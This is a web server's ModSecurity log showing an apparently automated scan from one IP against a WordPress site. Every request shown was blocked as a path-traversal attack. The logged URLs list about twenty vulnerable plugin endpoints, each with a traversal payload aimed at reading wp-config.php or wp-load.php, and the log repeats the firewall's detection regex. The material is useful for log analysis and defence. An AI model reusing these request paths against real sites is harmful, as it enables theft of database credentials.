[pid 19445:tid 140103301162752] [client 87.249.132.213:35026] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jquery-mega-menu/skin.php"] [unique_id "ZN-wVkWc94tsnIsHAQ-XVAAAAM8"] [Fri Aug 18 12:54:30.838001 2023] [:error] [pid 19445:tid 140103343126272] [client 87.249.132.213:35028] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/justified-image-grid/download.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/justified-image-grid/download.php"] [unique_id "ZN-wVkWc94tsnIsHAQ-XVQAAAMo"] [Fri Aug 18 12:54:30.943395 2023] [:error] [pid 18873:tid 140103343126272] [client 87.249.132.213:35030] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/livesig/livesig-ajax-backend.php?wp-root=..%2F..%2F..%2Fwp-config.php&action=asdf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/livesig/livesig-ajax-backend.php"] [unique_id "ZN-wVrCcrCl0jrDdhfxXHQAAAEo"] [Fri Aug 18 12:54:31.038255 2023] [:error] [pid 18873:tid 140103250806528] [client 87.249.132.213:35032] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/localize-my-post/ajax/include.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/localize-my-post/ajax/include.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXHgAAAFU"] [Fri Aug 18 12:54:31.145322 2023] [:error] [pid 18873:tid 140103482758912] [client 87.249.132.213:35034] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mac-photo-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-load.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mac-photo-gallery/macdownload.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXHwAAAEI"] [Fri Aug 18 12:54:31.249433 2023] [:error] [pid 19445:tid 140103499544320] [client 87.249.132.213:35036] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZN-wV0Wc94tsnIsHAQ-XVgAAAMA"] [Fri Aug 18 12:54:31.344243 2023] [:error] [pid 18873:tid 140103234021120] [client 87.249.132.213:35038] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mailz/lists/config/config.php?wpabspath=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mailz/lists/config/config.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXIAAAAFc"] [Fri Aug 18 12:54:31.438928 2023] [:error] [pid 18873:tid 140103499544320] [client 87.249.132.213:35040] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXIQAAAEA"] [Fri Aug 18 12:54:31.533597 2023] [:error] [pid 18873:tid 140103275984640] [client 87.249.132.213:35042] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXIgAAAFI"] [Fri Aug 18 12:54:31.628399 2023] [:error] [pid 18873:tid 140103292770048] [client 87.249.132.213:35044] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/myflash/myflash-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/myflash/myflash-button.php"] [unique_id "ZN-wV7CcrCl0jrDdhfxXIwAAAFA"] [Fri Aug 18 12:54:31.722677 2023] [:error] [pid 19445:tid 140103326340864] [client 87.249.132.213:35046] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php"] [unique_id "ZN-wV0Wc94tsnIsHAQ-XVwAAAMw"] [Fri Aug 18 12:54:31.818027 2023] [:error] [pid 19445:tid 140103317948160] [client 87.249.132.213:35048] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/old-post-spinner/logview.php?ops_file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/old-post-spinner/logview.php"] [unique_id "ZN-wV0Wc94tsnIsHAQ-XWAAAAM0"] [Fri Aug 18 12:54:31.912397 2023] [:error] [pid 19445:tid 140103284377344] [client 87.249.132.213:35050] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/page-flip-image-gallery/books/getConfig.php?book_id=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/page-flip-image-gallery/books/getConfig.php"] [unique_id "ZN-wV0Wc94tsnIsHAQ-XWQAAANE"] [Fri Aug 18 12:54:32.007147 2023] [:error] [pid 19445:tid 140103359911680] [client 87.249.132.213:35052] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/photocart-link/decode.php?id=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/photocart-link/decode.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XWgAAAMg"] [Fri Aug 18 12:54:32.103291 2023] [:error] [pid 18874:tid 140103376697088] [client 87.249.132.213:35054] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pica-photo-gallery/picadownload.php"] [unique_id "ZN-wWFxvK4MFoveIP9_KlwAAAIY"] [Fri Aug 18 12:54:32.211204 2023] [:error] [pid 18873:tid 140103242413824] [client 87.249.132.213:35056] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/pictpress/resize.php?size=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/pictpress/resize.php"] [unique_id "ZN-wWLCcrCl0jrDdhfxXJAAAAFY"] [Fri Aug 18 12:54:32.306012 2023] [:error] [pid 18873:tid 140103368304384] [client 87.249.132.213:35058] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/plugin-newsletter/preview.php?data=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/plugin-newsletter/preview.php"] [unique_id "ZN-wWLCcrCl0jrDdhfxXJQAAAEc"] [Fri Aug 18 12:54:32.400390 2023] [:error] [pid 19445:tid 140103351518976] [client 87.249.132.213:35060] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/post-recommendations-for-wordpress/lib/api.php?abspath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-recommendations-for-wordpress/lib/api.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XWwAAAMk"] [Fri Aug 18 12:54:32.510620 2023] [:error] [pid 19445:tid 140103465973504] [client 87.249.132.213:35062] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/rb-agency/ext/forcedownload.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XXAAAAMQ"] [Fri Aug 18 12:54:32.604669 2023] [:error] [pid 19445:tid 140103309555456] [client 87.249.132.213:35064] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XXQAAAM4"] [Fri Aug 18 12:54:32.699085 2023] [:error] [pid 19445:tid 140103250806528] [client 87.249.132.213:35066] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/relocate-upload/relocate-upload.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XXgAAANU"] [Fri Aug 18 12:54:32.792810 2023] [:error] [pid 19445:tid 140103376697088] [client 87.249.132.213:35068] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "ZN-wWEWc94tsnIsHAQ-XXwAAAMY"] [Fri Aug 18 12:54:32.887056 2023] [:error] [pid 19445:tid 140103491151616] [client 87.249.132.213:35070] [client 87.249.132.213] ModSecurity: Access denied with code 403 (phase 2). Pattern match 